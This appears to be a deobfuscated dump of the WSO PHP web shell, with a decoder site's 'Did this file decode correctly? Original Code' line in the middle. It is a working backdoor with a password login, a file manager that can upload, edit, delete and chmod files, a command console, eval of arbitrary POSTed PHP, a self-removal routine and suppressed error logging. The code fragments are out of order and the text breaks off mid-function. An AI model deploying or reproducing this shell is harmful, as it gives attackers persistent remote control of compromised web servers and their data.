goto n3X6Y;
dyMHz:
} else {
goto ec83q;
yJq0B:
$uid = $uid["uid"];
goto nZ1Iw;
nZ1Iw:
$group = $gid["name"];
goto LgEQ1;
LgEQ1:
$gid = $gid["gid"];
goto XEe3x;
q9aTZ:
$user = $uid["name"];
goto yJq0B;
ERGtZ:
$gid = @posix_getgrgid(posix_getegid());
goto q9aTZ;
ec83q:
$uid = @posix_getpwuid(posix_geteuid());
goto ERGtZ;
XEe3x:
}
goto HU3s7;
HU3s7:
$cwd_links = "";
goto PbU2y;
RzURU:
}
goto pXSrD;
lUvYe:
if (
!function_exists(
"posix_getgrgid"
) &&
strpos(
$GLOBALS[
"disable_functions"
],
"posix_getgrgid"
) === false
) {
function posix_getgrgid($p)
{
return false;
}
}
goto d62j5;
V8rDW:
@set_time_limit(0);
goto hd5Oa;
KCE0z:
function wsoWhich($p)
{
goto qE7x8;
bvBsL:
if (!empty($path)) {
return $path;
}
goto A0ITv;
qE7x8:
$path = wsoEx("which " . $p);
goto bvBsL;
A0ITv:
return false;
goto xhdvj;
xhdvj:
}
goto HhMRL;
guAyk:
function wsoScandir($dir)
{
if (function_exists("scandir")) {
return scandir($dir);
} else {
goto AwLVq;
hfmSV:
while (false !== ($filename = readdir($dh))) {
$files[] = $filename;
}
goto Rc9At;
Rc9At:
return $files;
goto dO6EV;
AwLVq:
$dh = opendir($dir);
goto hfmSV;
dO6EV:
}
}
goto KCE0z;
pXSrD:
function wsoFooter()
{
$is_writable = is_writable($GLOBALS["cwd"])
? " <font color='green'>(Writeable)</font>"
: " <font color=red>(Not writable)</font>";
echo "\xd\xa</div>\xd
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>\xd\xa\x9<tr>
\x9\x9<td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"'><input type=submit value='>>'></form></td>
\xa \x9<td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>\xd
</tr><tr>
\xa\x9 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
\xa\x9</tr><tr>\xd\xa <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
\xa <td><form method='post' ENCTYPE='multipart/form-data'>
\xa\x9\x9<input type=hidden name=a value='FilesMAn'>
\x9 <input type=hidden name=c value='" .
$GLOBALS["cwd"] .
"'>\xd
\x9 <input type=hidden name=p1 value='uploadFile'>\xd
\x9\x9<input type=hidden name=charset value='" .
(isset($_POST["charset"])
? $_POST["charset"]
: "") .
"'>
\x9\x9<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
\x9</tr></table></div></body></html>";
}
goto XeOpc;
Qn_9k:
function wsoLogin()
{
die(
"<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"
);
}
goto e2q7d;
i6mTz:
function actionSelfRemove()
{
goto KQZY3;
trHKc:
if ($_POST["p1"] != "yes") {
wsoHeader();
}
goto X7soZ;
X7soZ:
echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>";
goto tsvXj;
KQZY3:
if ($_POST["p1"] == "yes") {
if (
@unlink(
preg_replace(
"!\(\d+\)\s.*!",
"",
__FILE__
)
)
) {
die(
"Shell has been removed"
);
} else {
echo "unlink error!";
}
}
goto trHKc;
tsvXj:
wsoFooter();
goto n3JxC;
n3JxC:
}
goto DbGtY;
TQr3j:
if (!empty($auth_pass)) {
if (
isset($_POST["pass"]) &&
md5($_POST["pass"]) == $auth_pass
) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]),
$auth_pass
);
}
if (
!isset(
$_COOKIE[md5($_SERVER["HTTP_HOST"])]
) ||
$_COOKIE[md5($_SERVER["HTTP_HOST"])] !=
$auth_pass
) {
wsoLogin();
}
}
goto tZUOM;
e2q7d:
function WSOsetcookie($k, $v)
{
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
goto TQr3j;
yXkOt:
function wsoViewSize($s)
{
if ($s >= 1073741824) {
return sprintf("%1.2f", $s / 1073741824) . " GB";
} elseif ($s >= 1048576) {
return sprintf("%1.2f", $s / 1048576) . " MB";
} elseif ($s >= 1024) {
return sprintf("%1.2f", $s / 1024) . " KB";
} else {
return $s . " B";
}
}
goto etiAC;
Zxful:
exit();
?>
Did this file decode correctly?
Original Code
<?php
goto Cjo7J;
LqaMO:
$safe_mode = @ini_get("safe_mode");
goto zGahs;
zGahs:
if (!$safe_mode) {
error_reporting(0);
}
goto Gop14;
j2Rfu:
if (
!empty($_POST["a"]) &&
function_exists("action" . $_POST["a"])
) {
call_user_func("action" . $_POST["a"]);
}
goto Zxful;
GFRHq:
@ini_set("error_log", null);
goto g7ZCc;
N84uU:
function actionFilesMan()
{
goto J7jRR;
la8rp:
if (class_exists("ZipArchive")) {
echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
}
goto GTtN3;
uO4Od:
if (!empty($_POST["p1"])) {
switch ($_POST["p1"]) {
case "uploadFile":
if (
!@move_uploaded_file(
$_FILES["f"]["tmp_name"],
$_FILES["f"]["name"]
)
) {
echo "Can't upload file!";
}
break;
case "mkdir":
if (!@mkdir($_POST["p2"])) {
echo "Can't create new dir";
}
break;
case "delete":
goto zgV_d;
mm32x:
break;
goto hEfbk;
zgV_d:
function deleteDir($path)
{
goto RrCM3;
zxeby:
$dh = opendir($path);
goto TCJ3G;
TCJ3G:
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (
basename($item) == ".." ||
basename($item) == "."
) {
continue;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
}
goto qhDI4;
SLRoZ:
@rmdir($path);
goto ld2N6;
RrCM3:
$path = substr($path, -1) == "/" ? $path : $path . "/";
goto zxeby;
qhDI4:
closedir($dh);
goto SLRoZ;
ld2N6:
}
goto Jstso;
Jstso:
if (is_array(@$_POST["f"])) {
foreach ($_POST["f"] as $f) {
goto Fce39;
jTf8C:
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
goto sVDIO;
Fce39:
if ($f == "..") {
continue;
}
goto NavX2;
NavX2:
$f = urldecode($f);
goto jTf8C;
sVDIO:
}
}
goto mm32x;
hEfbk:
case "paste":
goto aIzMf;
aIzMf:
if ($_COOKIE["act"] == "copy") {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto DXZu5;
OpM7_:
$h = @opendir($c . $s);
goto XF_lF;
XF_lF:
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste(
$c . $s . "/",
$f,
$d . $s . "/"
);
}
}
goto v_Vn9;
DXZu5:
mkdir($d . $s);
goto OpM7_;
v_Vn9:
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["f"] as $f) {
copy_paste(
$_COOKIE["c"],
$f,
$GLOBALS["cwd"]
);
}
} elseif ($_COOKIE["act"] == "move") {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto qKJrU;
TXDEI:
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste(
$c . $s . "/",
$f,
$d . $s . "/"
);
}
}
goto xPGvS;
AwOVO:
$h = @opendir($c . $s);
goto TXDEI;
qKJrU:
mkdir($d . $s);
goto AwOVO;
xPGvS:
} elseif (@is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["f"] as $f) {
@rename(
$_COOKIE["c"] . $f,
$GLOBALS["cwd"] . $f
);
}
} elseif ($_COOKIE["act"] == "zip") {
if (
class_exists("ZipArchive")
) {
$zip = new ZipArchive();
if ($zip->open($_POST["p2"], 1)) {
goto Jun5P;
Jun5P:
chdir($_COOKIE["c"]);
goto T_RpN;
MVV2r:
$zip->close();
goto CqwAG;
T_RpN:
foreach ($_COOKIE["f"] as $f) {
if ($f == "..") {
continue;
}
if (@is_file($_COOKIE["c"] . $f)) {
$zip->addFile($_COOKIE["c"] . $f, $f);
} elseif (@is_dir($_COOKIE["c"] . $f)) {
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator(
$f . "/"
)
);
foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key);
}
}
}
goto JhWjt;
JhWjt:
chdir($GLOBALS["cwd"]);
goto MVV2r;
CqwAG:
}
}
} elseif ($_COOKIE["act"] == "unzip") {
if (
class_exists("ZipArchive")
) {
$zip = new ZipArchive();
foreach ($_COOKIE["f"] as $f) {
if ($zip->open($_COOKIE["c"] . $f)) {
$zip->extractTo($GLOBALS["cwd"]);
$zip->close();
}
}
}
} elseif ($_COOKIE["act"] == "tar") {
goto nrwbR;
QmWa1:
chdir($GLOBALS["cwd"]);
goto bK26y;
zHKjB:
wsoEx(
"tar cfzv " .
escapeshellarg($_POST["p2"]) .
" " .
implode(" ", $_COOKIE["f"])
);
goto QmWa1;
BU3zr:
$_COOKIE["f"] = array_map(
"escapeshellarg",
$_COOKIE["f"]
);
goto zHKjB;
nrwbR:
chdir($_COOKIE["c"]);
goto BU3zr;
bK26y:
}
goto tJ8ED;
HwZnR:
setcookie("f", "", time() - 3600);
goto TZk2t;
TZk2t:
break;
goto yoTwQ;
tJ8ED:
unset($_COOKIE["f"]);
goto HwZnR;
yoTwQ:
default:
if (!empty($_POST["p1"])) {
goto TYMaj;
XHEG8:
WSOsetcookie("c", @$_POST["c"]);
goto Unr9o;
TYMaj:
WSOsetcookie("act", $_POST["p1"]);
goto XUMLY;
XUMLY:
WSOsetcookie("f", serialize(@$_POST["f"]));
goto XHEG8;
Unr9o:
}
break;
}
}
goto bpziK;
JbUVa:
usort($files, "wsoCmp");
goto pBUl1;
RjKbq:
function wsoCmp($a, $b)
{
if ($GLOBALS["sort"][0] != "size") {
return strcmp(
strtolower($a[$GLOBALS["sort"][0]]),
strtolower($b[$GLOBALS["sort"][0]])
) * ($GLOBALS["sort"][1] ? 1 : -1);
} else {
return ($a["size"] < $b["size"] ? -1 : 1) *
($GLOBALS["sort"][1] ? 1 : -1);
}
}
goto JbUVa;
flVXx:
$GLOBALS["sort"] = $sort;
goto RjKbq;
b42P7:
echo "</select> ";
goto zga6H;
QsnjB:
$dirContent = wsoScandir(
isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]
);
goto DufhY;
EoM5y:
if (!empty($_POST["p1"])) {
if (
preg_match(
"!s_([A-z]+)_(\d{1})!",
$_POST["p1"],
$match
)
) {
$sort = [$match[1], (int) $match[2]];
}
}
goto uaEIV;
ecDrl:
echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>";
goto QsnjB;
J7jRR:
if (!empty($_COOKIE["f"])) {
$_COOKIE["f"] = @unserialize($_COOKIE["f"]);
}
goto uO4Od;
zqQv8:
foreach ($files as $f) {
echo "<tr" .
($l ? " class=l1" : "") .
"><td><input type=checkbox name="f[]" value="" .
urlencode($f["name"]) .
"" class=chkbx></td><td><a href=# onclick="" .
($f["type"] == "file"
? "g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'view')">" .
htmlspecialchars($f["name"])
: "g('FilesMan','" .
$f["path"] .
"');" " .
(empty($f["link"])
? ""
: "title='{$f["link"]}'") .
"><b>[ " .
htmlspecialchars($f["name"]) .
" ]</b>") .
"</a></td><td>" .
($f["type"] == "file"
? wsoViewSize($f["size"])
: $f["type"]) .
"</td><td>" .
$f["modify"] .
"</td><td>" .
$f["owner"] .
"/" .
$f["group"] .
"</td><td><a href=# onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"','chmod')">" .
$f["perms"] .
"</td><td><a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'touch')">T</a>" .
($f["type"] == "file"
? " <a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'download')">D</a>"
: "") .
"</td></tr>";
$l = $l ? 0 : 1;
}
goto b9q_L;
ICFmG:
$l = 0;
goto zqQv8;
TSLht:
$n = count($dirContent);
goto p625P;
lC5LC:
$dirs = $files = [];
goto TSLht;
uaEIV:
echo "<script>\xd
function sa() {
for(i=0;i<d.files.elements.length;i++)
\x9 if(d.files.elements[i].type == 'checkbox')\xd\xa \x9 d.files.elements[i].checked = d.files.elements[0].checked;\xd\xa }\xd\xa</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xd
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" .
($sort[1] ? 0 : 1) .
"")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" .
($sort[1] ? 0 : 1) .
"")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" .
($sort[1] ? 0 : 1) .
"")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" .
($sort[1] ? 0 : 1) .
"")'>Permissions</a></th><th>Actions</th></tr>";
goto lC5LC;
b9q_L:
echo "<tr><td colspan=7>\xd\xa <input type=hidden name=a value='FilesMan'>\xd\xa\x9<input type=hidden name=c value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"'>
\xa <input type=hidden name=charset value='" .
(isset($_POST["charset"])
? $_POST["charset"]
: "") .
"'>\xd\xa <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
goto la8rp;
MMpaa:
$sort = ["name", 1];
goto EoM5y;
bpziK:
wsoHeader();
goto ecDrl;
GTtN3:
echo "<option value='tar'>Compress (tar.gz)</option>";
goto qCBL1;
zga6H:
if (
!empty($_COOKIE["act"]) &&
@count($_COOKIE["f"]) &&
($_COOKIE["act"] == "zip" ||
$_COOKIE["act"] == "tar")
) {
echo "file name: <input type=text name=p2 value='wso_" .
date("Ymd_His") .
"." .
($_COOKIE["act"] == "zip"
? "zip"
: "tar.gz") .
"'> ";
}
goto T3WX2;
DufhY:
if ($dirContent === false) {
goto KJVLY;
PFKsl:
wsoFooter();
goto ZsRi7;
KJVLY:
echo "Can't open this folder!";
goto PFKsl;
ZsRi7:
return;
goto Uwcm2;
Uwcm2:
}
goto S7vm3;
T3WX2:
echo "<input type='submit' value='>>'></td></tr></form></table></div>";
goto LlrBb;
LlrBb:
wsoFooter();
goto JxN5l;
S7vm3:
global $sort;
goto MMpaa;
pBUl1:
usort($dirs, "wsoCmp");
goto zukJ7;
p625P:
for ($i = 0; $i < $n; $i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = [
"name" => $dirContent[$i],
"path" => $GLOBALS["cwd"] . $dirContent[$i],
"modify" => date(
"Y-m-d H:i:s",
@filemtime($GLOBALS["cwd"] . $dirContent[$i])
),
"perms" => wsoPermsColor(
$GLOBALS["cwd"] . $dirContent[$i]
),
"size" => @filesize(
$GLOBALS["cwd"] . $dirContent[$i]
),
"owner" => $ow["name"]
? $ow["name"]
: @fileowner($dirContent[$i]),
"group" => $gr["name"]
? $gr["name"]
: @filegroup($dirContent[$i]),
];
if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) {
$files[] = array_merge($tmp, [
"type" => "file",
]);
} elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) {
$dirs[] = array_merge($tmp, [
"type" => "link",
"link" => readlink($tmp["path"]),
]);
} elseif (
@is_dir($GLOBALS["cwd"] . $dirContent[$i]) &&
$dirContent[$i] != "."
) {
$dirs[] = array_merge($tmp, ["type" => "dir"]);
}
}
goto flVXx;
qCBL1:
if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) {
echo "<option value='paste'>Paste / Compress</option>";
}
goto b42P7;
zukJ7:
$files = array_merge($dirs, $files);
goto ICFmG;
JxN5l:
}
goto KC9ar;
xB4MH:
function actionFilesTools()
{
goto BkWtk;
URhzm:
if (is_file($_POST["p1"])) {
$m = [
"View",
"Highlight",
"Download",
"Hexdump",
"Edit",
"Chmod",
"Rename",
"Touch",
];
} else {
$m = [
"Chmod",
"Rename",
"Touch",
];
}
goto ehyTX;
gIv2Z:
echo "</div>";
goto q1Rl0;
ehyTX:
foreach ($m as $v) {
echo "<a href=# onclick="g(null,null,'" .
urlencode($_POST["p1"]) .
"','" .
strtolower($v) .
"')">" .
(strtolower($v) == @$_POST["p2"]
? "<b>[ " . $v . " ]</b>"
: $v) .
"</a> ";
}
goto OeBNf;
FcH_v:
if (!$uid) {
$uid["name"] = @fileowner($_POST["p1"]);
$gid["name"] = @filegroup($_POST["p1"]);
} else {
$gid = @posix_getgrgid(@filegroup($_POST["p1"]));
}
goto XQqyZ;
tJhrh:
if (@$_POST["p2"] == "mkfile") {
if (!file_exists($_POST["p1"])) {
$fp = @fopen($_POST["p1"], "w");
if ($fp) {
$_POST["p2"] = "edit";
fclose($fp);
}
}
}
goto UpcWr;
hJxBN:
echo "<h1>File tools</h1><div class=content>";
goto LggyK;
jReNS:
if (empty($_POST["p2"])) {
$_POST["p2"] = "view";
}
goto URhzm;
OeBNf:
echo "<br><br>";
goto kfx86;
vLiGd:
echo "<span>Create time:</span> " .
date(
"Y-m-d H:i:s",
filectime($_POST["p1"])
) .
" <span>Access time:</span> " .
date(
"Y-m-d H:i:s",
fileatime($_POST["p1"])
) .
" <span>Modify time:</span> " .
date(
"Y-m-d H:i:s",
filemtime($_POST["p1"])
) .
"<br><br>";
goto jReNS;
LggyK:
if (!file_exists(@$_POST["p1"])) {
goto uyJNU;
C_fb1:
return;
goto fRIHs;
uyJNU:
echo "File not exists";
goto aEu8k;
aEu8k:
wsoFooter();
goto C_fb1;
fRIHs:
}
goto RVSqZ;
BkWtk:
if (isset($_POST["p1"])) {
$_POST["p1"] = urldecode($_POST["p1"]);
}
goto nB0r7;
UpcWr:
wsoHeader();
goto hJxBN;
q1Rl0:
wsoFooter();
goto lZIie;
RVSqZ:
$uid = @posix_getpwuid(@fileowner($_POST["p1"]));
goto FcH_v;
kfx86:
switch ($_POST["p2"]) {
case "view":
goto QAifq;
bn9Hw:
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
goto bbBoN;
bbBoN:
echo "</pre>";
goto K9Wsy;
GqRN7:
$fp = @fopen($_POST["p1"], "r");
goto bn9Hw;
K9Wsy:
break;
goto xBp1j;
QAifq:
echo "<pre class=ml1>";
goto GqRN7;
xBp1j:
case "highlight":
if (@is_readable($_POST["p1"])) {
goto QC8Iq;
XU2TQ:
$code = @highlight_file($_POST["p1"], true);
goto MtAXT;
QC8Iq:
echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">";
goto XU2TQ;
MtAXT:
echo str_replace(
["<span ", "</span>"],
[
"<font ",
"</font>",
],
$code
) . "</div>";
goto nntLP;
nntLP:
}
break;
case "chmod":
goto P8hG1;
LoNwV:
break;
goto AyuC5;
lmil1:
echo "<script>p3_="";</script><form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,this.chmod.value);return false;"><input type=text name=chmod value="" .
substr(sprintf("%o", fileperms($_POST["p1"])), -4) .
""><input type=submit value=">>"></form>";
goto LoNwV;
AAUh2:
clearstatcache();
goto lmil1;
P8hG1:
if (!empty($_POST["p3"])) {
goto dVl9Y;
brcvZ:
for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) {
$perms +=
(int) $_POST["p3"][$i] *
pow(8, strlen($_POST["p3"]) - $i - 1);
}
goto NKCFJ;
NKCFJ:
if (!@chmod($_POST["p1"], $perms)) {
echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>";
}
goto PY3E2;
dVl9Y:
$perms = 0;
goto brcvZ;
PY3E2:
}
goto AAUh2;
AyuC5:
case "edit":
goto H2fMN;
jCDwf:
echo "</textarea><input type=submit value=">>"></form>";
goto Pjp_6;
l2f3k:
echo "<form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>";
goto B2Klk;
YessQ:
if (!empty($_POST["p3"])) {
goto rcwpk;
JCP0G:
$fp = @fopen($_POST["p1"], "w");
goto UIGX9;
UIGX9:
if ($fp) {
goto AyUGu;
ZpECv:
echo "Saved!<br><script>p3_="";</script>";
goto ukKwu;
zJt34:
@fclose($fp);
goto ZpECv;
AyUGu:
@fwrite($fp, $_POST["p3"]);
goto zJt34;
ukKwu:
@touch($_POST["p1"], $time, $time);
goto w_o1Q;
w_o1Q:
}
goto ccEmf;
yLb3a:
$_POST["p3"] = substr($_POST["p3"], 1);
goto JCP0G;
rcwpk:
$time = @filemtime($_POST["p1"]);
goto yLb3a;
ccEmf:
}
goto l2f3k;
H2fMN:
if (!is_writable($_POST["p1"])) {
echo "File isn't writeable";
break;
}
goto YessQ;
B2Klk:
$fp = @fopen($_POST["p1"], "r");
goto of9BR;
of9BR:
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
goto jCDwf;
Pjp_6:
break;
goto Gznea;
Gznea:
case "hexdump":
goto m3kPv;
AuUGX:
$h = ["00000000<br>", "", ""];
goto GyLAr;
qeOJi:
$n = 0;
goto AuUGX;
jL3k2:
echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" .
$h[0] .
"</pre></span></td><td bgcolor=#282828><pre>" .
$h[1] .
"</pre></td><td bgcolor=#333333><pre>" .
htmlspecialchars($h[2]) .
"</pre></td></tr></table>";
goto Ufiap;
m3kPv:
$c = @file_get_contents($_POST["p1"]);
goto qeOJi;
Lem2Z:
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf("%02X", ord($c[$i])) . " ";
switch (ord($c[$i])) {
case 0:
$h[2] .= " ";
break;
case 9:
$h[2] .= " ";
break;
case 10:
$h[2] .= " ";
break;
case 13:
$h[2] .= " ";
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
goto NPU7A;
NPU7A:
$n = 0;
goto LQkUO;
fObRZ:
$h[1] .= "<br>";
goto fMXko;
LQkUO:
if ($i + 1 < $len) {
$h[0] .=
sprintf("%08X", $i + 1) .
"<br>";
}
goto fObRZ;
fMXko:
$h[2] .= "
";
goto BJu_G;
BJu_G:
}
}
goto jL3k2;
GyLAr:
$len = strlen($c);
goto Lem2Z;
Ufiap:
break;
goto owLSP;
owLSP:
case "rename":
goto DPp_y;
zaQju:
break;
goto Mf7Ir;
DPp_y:
if (!empty($_POST["p3"])) {
if (!@rename($_POST["p1"], $_POST["p3"])) {
echo "Can't rename!<br>";
} else {
die(
"<script>g(null,null,"" .
urlencode($_POST["p3"]) .
"",null,"")</script>"
);
}
}
goto S0xqX;
S0xqX:
echo "<form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,this.name.value);return false;"><input type=text name=name value="" .
htmlspecialchars($_POST["p1"]) .
""><input type=submit value=">>"></form>";
goto zaQju;
Mf7Ir:
case "touch":
goto MdNj9;
fcpc8:
echo "<script>p3_="";</script><form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,this.touch.value);return false;"><input type=text name=touch value="" .
date(
"Y-m-d H:i:s",
@filemtime($_POST["p1"])
) .
""><input type=submit value=">>"></form>";
goto vSHOq;
vSHOq:
break;
goto RapuR;
GWQpw:
clearstatcache();
goto fcpc8;
MdNj9:
if (!empty($_POST["p3"])) {
$time = strtotime($_POST["p3"]);
if ($time) {
if (!touch($_POST["p1"], $time, $time)) {
echo "Fail!";
} else {
echo "Touched!";
}
} else {
echo "Bad time format!";
}
}
goto GWQpw;
RapuR:
}
goto gIv2Z;
nB0r7:
if (@$_POST["p2"] == "download") {
if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) {
goto kEAXk;
LrqUY:
$fp = @fopen($_POST["p1"], "r");
goto oCCHm;
rpfQA:
if (
function_exists(
"mime_content_type"
)
) {
$type = @mime_content_type($_POST["p1"]);
header(
"Content-Type: " .
$type
);
} else {
header(
"Content-Type: application/octet-stream"
);
}
goto LrqUY;
oCCHm:
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
goto Vqm3n;
PiFXF:
header(
"Content-Disposition: attachment; filename=" .
basename($_POST["p1"])
);
goto rpfQA;
kEAXk:
ob_start("ob_gzhandler", 4096);
goto PiFXF;
Vqm3n:
}
exit();
}
goto tJhrh;
XQqyZ:
echo "<span>Name:</span> " .
htmlspecialchars(@basename($_POST["p1"])) .
" <span>Size:</span> " .
(is_file($_POST["p1"])
? wsoViewSize(filesize($_POST["p1"]))
: "-") .
" <span>Permission:</span> " .
wsoPermsColor($_POST["p1"]) .
" <span>Owner/Group:</span> " .
$uid["name"] .
"/" .
$gid["name"] .
"<br>";
goto vLiGd;
lZIie:
}
goto w2GF1;
etiAC:
function wsoPerms($p)
{
goto kfyb8;
GUcgT:
$i .=
$p & 0x1
? ($p & 0x200
? "t"
: "x")
: ($p & 0x200
? "T"
: "-");
goto mshmE;
kfyb8:
if (($p & 0xc000) == 0xc000) {
$i = "s";
} elseif (($p & 0xa000) == 0xa000) {
$i = "l";
} elseif (($p & 0x8000) == 0x8000) {
$i = "-";
} elseif (($p & 0x6000) == 0x6000) {
$i = "b";
} elseif (($p & 0x4000) == 0x4000) {
$i = "d";
} elseif (($p & 0x2000) == 0x2000) {
$i = "c";
} elseif (($p & 0x1000) == 0x1000) {
$i = "p";
} else {
$i = "u";
}
goto pqnZD;
GuUyD:
$i .= $p & 0x2 ? "w" : "-";
goto GUcgT;
Vg6sO:
$i .= $p & 0x10 ? "w" : "-";
goto vneDY;
I8J2d:
$i .=
$p & 0x40
? ($p & 0x800
? "s"
: "x")
: ($p & 0x800
? "S"
: "-");
goto yfJn7;
pqnZD:
$i .= $p & 0x100 ? "r" : "-";
goto FjLaa;
yfJn7:
$i .= $p & 0x20 ? "r" : "-";
goto Vg6sO;
FjLaa:
$i .= $p & 0x80 ? "w" : "-";
goto I8J2d;
vneDY:
$i .=
$p & 0x8
? ($p & 0x400
? "s"
: "x")
: ($p & 0x400
? "S"
: "-");
goto e6Pjl;
e6Pjl:
$i .= $p & 0x4 ? "r" : "-";
goto GuUyD;
mshmE:
return $i;
goto MofP7;
MofP7:
}
goto eRZM6;
j4eIF:
if (
!isset(
$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
)
) {
$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
] = (bool) $default_use_ajax;
}
goto EoPoZ;
qZOco:
if (isset($_POST["c"])) {
@chdir($_POST["c"]);
}
goto sO9OV;
tZUOM:
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
$os = "win";
} else {
$os = "nix";
}
goto LqaMO;
B8b3D:
function actionRC()
{
if (!@$_POST["p1"]) {
$a = [
"uname" => php_uname(),
"php_version" => phpversion(),
"wso_version" => WSO_VERSION,
"safemode" => @ini_get(
"safe_mode"
),
];
echo serialize($a);
} else {
eval($_POST["p1"]);
}
}
goto dPSqc;
Gop14:
$disable_functions = @ini_get(
"disable_functions"
);
goto oE6Ue;
oHsYW:
function actionPhp()
{
goto s1VTJ;
ujMFQ:
wsoFooter();
goto dfcYP;
s1VTJ:
if (isset($_POST["ajax"])) {
goto jtGxB;
XiIjv:
eval($_POST["p1"]);
goto pcNS1;
cL7XN:
ob_start();
goto XiIjv;
keRr1:
exit();
goto cNits;
t7wh1:
echo strlen($temp), "
", $temp;
goto keRr1;
pcNS1:
$temp =
"document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" .
addcslashes(
htmlspecialchars(ob_get_clean()),
"\xa
\'\x0"
) .
"';\xa";
goto t7wh1;
jtGxB:
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
true
);
goto cL7XN;
cNits:
}
goto IyHRn;
wcs04:
echo "</pre></div>";
goto ujMFQ;
Sz7n2:
echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" .
(!empty($_POST["p1"])
? htmlspecialchars($_POST["p1"])
: "") .
"</textarea><input type=submit value=Eval style="margin-top:5px">";
goto bE4Om;
t2vRD:
wsoHeader();
goto om2si;
oWPfu:
if (!empty($_POST["p1"])) {
goto uFjl_;
uFjl_:
ob_start();
goto XYFVS;
qDLEK:
echo htmlspecialchars(ob_get_clean());
goto Zre8T;
XYFVS:
eval($_POST["p1"]);
goto qDLEK;
Zre8T:
}
goto wcs04;
IyHRn:
if (empty($_POST["ajax"]) && !empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
0
);
}
goto t2vRD;
om2si:
if (isset($_POST["p2"]) && $_POST["p2"] == "info") {
goto u6Vem;
u6Vem:
